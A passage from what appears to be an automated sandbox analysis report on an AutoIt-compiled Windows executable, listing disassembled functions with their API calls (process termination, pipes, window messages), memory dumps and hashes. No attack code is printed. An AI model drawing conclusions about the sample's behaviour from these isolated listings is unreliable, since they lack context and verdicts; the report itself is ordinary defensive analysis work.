                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000,?,?,?,00BCAB12), ref: 00BE080A
                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000,?,?,?,00BCAB12), ref: 00BE0812
                                                                                                                                                  • MapVirtualKeyW.USER32(00000012,00000000,?,?,?,00BCAB12), ref: 00BE081A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Virtual
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4278518827-0
                                                                                                                                                  • Opcode ID: 7b6008c24429551e696d334afe1d3b4bd2ed0baa326c6cbaedb648b0dbff1f2c
                                                                                                                                                  • Instruction ID: 06d8f244f5a6ca8123e8e72a3abc53f1defddc3610ec4de6da485e26926492ff
                                                                                                                                                  • Opcode Fuzzy Hash: 7b6008c24429551e696d334afe1d3b4bd2ed0baa326c6cbaedb648b0dbff1f2c
                                                                                                                                                  • Instruction Fuzzy Hash: 9A0148B09017597DE3008F5A8C85B56FEA8FF59354F00411BA15847941C7B5A864CBE5
                                                                                                                                                  Function 00C259A4 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00C259B4
                                                                                                                                                  • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C259CA
                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C259D9
                                                                                                                                                  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C259E8
                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C259F2
                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00C259F9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 839392675-0
                                                                                                                                                  • Opcode ID: 1509103e0953178c0d1684086267838e1f8f15d0a16a40834809632b7d5fabe2
                                                                                                                                                  • Instruction ID: 97052c32e9ca80d2bfe67860c4aace70ca1d47b5328e082a2d72c8774b3a3f60
                                                                                                                                                  • Opcode Fuzzy Hash: 1509103e0953178c0d1684086267838e1f8f15d0a16a40834809632b7d5fabe2
                                                                                                                                                  • Instruction Fuzzy Hash: 1EF01D36241658BBE7215B929C0DFEF7B7CEBC6B12F100159FE05E1050DBA11A9186B5
                                                                                                                                                  Function 00C277EB Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,?,?,?,?,00C045ED,?,?,?,?,00BCC2B6,?,?), ref: 00C277FE
                                                                                                                                                  • EnterCriticalSection.KERNEL32(?,?,00BCC2B6,?,?), ref: 00C2780F
                                                                                                                                                  • TerminateThread.KERNEL32(00000000,000001F6,?,00BCC2B6,?,?), ref: 00C2781C
                                                                                                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00BCC2B6,?,?), ref: 00C27829
                                                                                                                                                    • Part of subcall function 00C271F0: CloseHandle.KERNEL32(00000000,?,00C27836,?,00BCC2B6,?,?), ref: 00C271FA
                                                                                                                                                  • InterlockedExchange.KERNEL32(?,000001F6,?,00BCC2B6,?,?), ref: 00C2783C
                                                                                                                                                  • LeaveCriticalSection.KERNEL32(?,?,00BCC2B6,?,?), ref: 00C27843
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3495660284-0
                                                                                                                                                  • Opcode ID: c2919e4a43a13b88621b0ba8fa1a1cb53e7515975537e7499eaf6a62886e410a
                                                                                                                                                  • Instruction ID: 65be9d6565c338bfab896b84349752edb58c6aa69c703965eb760f443a00e4ca
                                                                                                                                                  • Opcode Fuzzy Hash: c2919e4a43a13b88621b0ba8fa1a1cb53e7515975537e7499eaf6a62886e410a
                                                                                                                                                  • Instruction Fuzzy Hash: 68F0583A145722ABD7112B64EC8CBAF7729FF49303F240521F202F54A2CFB55991DB61
                                                                                                                                                  Function 00C1954A Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00C19555
                                                                                                                                                  • UnloadUserProfile.USERENV(?,?), ref: 00C19561
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00C1956A
                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 00C19572
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00C1957B
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00C19582
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 146765662-0
                                                                                                                                                  • Opcode ID: 357f36b81ce1b2c71425efbc2e212371c92f58065141c8f754a887bf56dfa595
                                                                                                                                                  • Instruction ID: b489a840ef30ff3208423bb7dd50f7d7e60ea86f0ccd0419a7a8a6a5f7f8f3e1
                                                                                                                                                  • Opcode Fuzzy Hash: 357f36b81ce1b2c71425efbc2e212371c92f58065141c8f754a887bf56dfa595
                                                                                                                                                  • Instruction Fuzzy Hash: A2E0C23A004601BBDA011BE1EC0CB5EBB29FB49723B204220F215E1470CB32A4A0DB51
                                                                                                                                                  Function 00C38CD7 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • #8.OLEAUT32(?,00C50980), ref: 00C38CFD
                                                                                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00C38E0C
                                                                                                                                                  • #9.OLEAUT32(?,00000001,00000000,Incorrect Parameter format,00000000), ref: 00C38F84
                                                                                                                                                    • Part of subcall function 00C27B1D: #8.OLEAUT32(00000000,?,?,?,?,?,00C39DBE,?,?), ref: 00C27B5D
                                                                                                                                                    • Part of subcall function 00C27B1D: #10.OLEAUT32(00000000,?,?,00C39DBE,?,?), ref: 00C27B66
                                                                                                                                                    • Part of subcall function 00C27B1D: #9.OLEAUT32(00000000,?,00C39DBE,?,?), ref: 00C27B72
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: BuffCharUpper
                                                                                                                                                  • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                                                  • API String ID: 3964851224-1221869570
                                                                                                                                                  • Opcode ID: 865758215bcb830fe0232b3bc3f4a0be39e66385bd48c56dbd885305a95f3a5f
                                                                                                                                                  • Instruction ID: ddc061332d4e22c4248741715a57951b3305ed6a06ee253169e89b46085de919
                                                                                                                                                  • Opcode Fuzzy Hash: 865758215bcb830fe0232b3bc3f4a0be39e66385bd48c56dbd885305a95f3a5f
                                                                                                                                                  • Instruction Fuzzy Hash: 68917D746183019FC710EF24C48095ABBF5EF99754F14896EF89A8B3A1DB30EE49CB52
                                                                                                                                                  Function 00C2323D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD436A: _wcscpy.LIBCMT ref: 00BD438D
                                                                                                                                                  • _memset.LIBCMT ref: 00C2332E
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C2335D
                                                                                                                                                  • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00C23410
                                                                                                                                                  • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00C2343E
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 4152858687-4108050209
                                                                                                                                                  • Opcode ID: 0187da3d2b43deb9beea7f5decfec29ea92eaca6295dfaa29ced706600643801
                                                                                                                                                  • Instruction ID: 9fd3547474c4d1f7ecb027d9ab5ae7fee74ab89fb0a269ba2f01b488307fb20d
                                                                                                                                                  • Opcode Fuzzy Hash: 0187da3d2b43deb9beea7f5decfec29ea92eaca6295dfaa29ced706600643801
                                                                                                                                                  • Instruction Fuzzy Hash: 0251D2312083A09BC715EE28E84566BBBE4AF45710F140A6DF8A1D35E1DB78DB44CB56
                                                                                                                                                  Function 00C22EFA Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00C22F67
                                                                                                                                                  • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C22F83
                                                                                                                                                  • DeleteMenu.USER32(?,00000007,00000000), ref: 00C22FC9
                                                                                                                                                  • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00C87890,00000000), ref: 00C23012
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Delete$InfoItem_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 1173514356-4108050209
                                                                                                                                                  • Opcode ID: e3a42e777b91b791322fc88f559423688b35e6b1df9374d391115517531fc4bd
                                                                                                                                                  • Instruction ID: 02b7c2e18b0997eeaddd518dfb7a8b37d0e4959c2a6501a1a2ef743968f98164
                                                                                                                                                  • Opcode Fuzzy Hash: e3a42e777b91b791322fc88f559423688b35e6b1df9374d391115517531fc4bd
                                                                                                                                                  • Instruction Fuzzy Hash: 9441D5312043A1AFD724DF24E884B1ABBE4AF84710F104A1EF965DB3D1DB74EA05CB62
                                                                                                                                                  Function 00C19A48 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1A36: _memmove.LIBCMT ref: 00BD1A77
                                                                                                                                                    • Part of subcall function 00C1B79A: GetClassNameW.USER32(?,?,000000FF), ref: 00C1B7BD
                                                                                                                                                  • SendMessageW.USER32(?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C19ACC
                                                                                                                                                  • SendMessageW.USER32(?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?,?,ComboBox), ref: 00C19ADF
                                                                                                                                                  • SendMessageW.USER32(?,00000189,?,00000000,?,0000018A,00000000,00000000,?,00000188,00000000,00000000,?,?,ListBox,?), ref: 00C19B0F
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$_memmove$ClassName
                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                  • API String ID: 365058703-1403004172
                                                                                                                                                  • Opcode ID: f72cf994002f2a9fb869eb6f34057547045ae51f3c4e84a81a3c84cac2166e05
                                                                                                                                                  • Instruction ID: bcdd8d62606db2cc2a46d9d8ab8db230ca701ecc593936478e6559c93ac68c14
                                                                                                                                                  • Opcode Fuzzy Hash: f72cf994002f2a9fb869eb6f34057547045ae51f3c4e84a81a3c84cac2166e05
                                                                                                                                                  • Instruction Fuzzy Hash: DE2107759001047FDB24EBA4DC55DFEB7B8DF42360F10851AF825A72D1DB344E89A660
                                                                                                                                                  Function 00C46A0C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BC2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,00BC2004), ref: 00BC214F
                                                                                                                                                    • Part of subcall function 00BC2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096,?), ref: 00BC2163
                                                                                                                                                    • Part of subcall function 00BC2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,00BC2004,?,?,static,00C50980,?,?,?,00000096,00000096), ref: 00BC216D
                                                                                                                                                  • SendMessageW.USER32(00000000,00000467,00000000,?,?,00000000,SysAnimate32,00000000,?,?,?,?,?,?,?,00000000), ref: 00C46A86
                                                                                                                                                  • LoadLibraryW.KERNEL32(?), ref: 00C46A8D
                                                                                                                                                  • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C46AA2
                                                                                                                                                  • DestroyWindow.USER32(?), ref: 00C46AAA
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                                                  • String ID: SysAnimate32
                                                                                                                                                  • API String ID: 4146253029-1011021900
                                                                                                                                                  • Opcode ID: 9064699ad5bbf84ec822984b15494b8f34d53e9a741df53e873d3927abc91b3d
                                                                                                                                                  • Instruction ID: 039e7c7ce39ab8d828e2ee228030e6c01afe3b512b995dcf1ac2f846c1e402a8
                                                                                                                                                  • Opcode Fuzzy Hash: 9064699ad5bbf84ec822984b15494b8f34d53e9a741df53e873d3927abc91b3d
                                                                                                                                                  • Instruction Fuzzy Hash: 59218E71200605AFEF108F64DC81FBB7BA9FB56728F208618FA60A2194D731DC91A761
                                                                                                                                                  Function 00C27357 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C27377
                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C273AA
                                                                                                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00C273BC
                                                                                                                                                  • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00C273F6
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                                  • String ID: nul
                                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                                  • Opcode ID: d18f5d8927ea249f9cabda0de84f46512daa347c066351ddfb117a4a9c923592
                                                                                                                                                  • Instruction ID: 8546a3a870548dcbc9674edf3719f9936efd488159d56c508032ad87fe7917f9
                                                                                                                                                  • Opcode Fuzzy Hash: d18f5d8927ea249f9cabda0de84f46512daa347c066351ddfb117a4a9c923592
                                                                                                                                                  • Instruction Fuzzy Hash: 69219F74508326ABDB208F69EC88B9E7BA4AF44720F204B19FCA1E76E0D770D950DB50
                                                                                                                                                  Function 00C27425 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C27444
                                                                                                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00C27476
                                                                                                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00C27487
                                                                                                                                                  • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00C274C1
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateHandle$FilePipe
                                                                                                                                                  • String ID: nul
                                                                                                                                                  • API String ID: 4209266947-2873401336
                                                                                                                                                  • Opcode ID: d04e2e895319d4c2390c298d70390bb1bb1adced56301f5badb434d385331a0a
                                                                                                                                                  • Instruction ID: cff3baa5b503a3b66ef1a907eb08e0530bfec75aeae4bf68696be72e2ee02793
                                                                                                                                                  • Opcode Fuzzy Hash: d04e2e895319d4c2390c298d70390bb1bb1adced56301f5badb434d385331a0a
                                                                                                                                                  • Instruction Fuzzy Hash: D221F4345083259BDB20AF68AC84B9A7BA8AF54330F200B09FCB0E32D0DB709940CB50
                                                                                                                                                  Function 00C2B283 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C2B297
                                                                                                                                                  • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C2B2EB
                                                                                                                                                  • __swprintf.LIBCMT ref: 00C2B304
                                                                                                                                                  • SetErrorMode.KERNEL32(00000000,00000001,00000000,00C50980), ref: 00C2B342
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 0000000B.00000002.3805003254.0000000000BC1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                  • Associated: 0000000B.00000002.3804977022.0000000000BC0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C50000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805074239.0000000000C76000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805157809.0000000000C80000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  • Associated: 0000000B.00000002.3805180089.0000000000C89000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_11_2_bc0000_Pct.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                  • String ID: %lu
                                                                                                                                                  • API String ID: 3164766367-685833217
                                                                                                                                                  • Opcode ID: acb99bb6b1c850dd7e947320b36e4e1ab13c429dc79f47641f85e5c01c3a7ff6
                                                                                                                                                  • Instruction ID: a89ce55ca5e84682905d8e14d608844c9c1e107ab37cf5262e1e1ca6aef71d08
                                                                                                                                                  • Opcode Fuzzy Hash: acb99bb6b1c850dd7e947320b36e4e1ab13c429dc79f47641f85e5c01c3a7ff6
                                                                                                                                                  • Instruction Fuzzy Hash: C0213034A00209AFCB10EF65DC55EAEB7F8EF49714B1080A9F909E7252DB31EE45DB61
                                                                                                                                                  Function 00C1AC05 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00BD1821: _memmove.LIBCMT ref: 00BD185B
                                                                                                                                                    • Part of subcall function 00C1AA52: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00C1AA6F
                                                                                                                                                    • Part of subcall function 00C1AA52: GetWindowThreadProcessId.USER32(?,00000000,00000000), ref: 00C1AA82
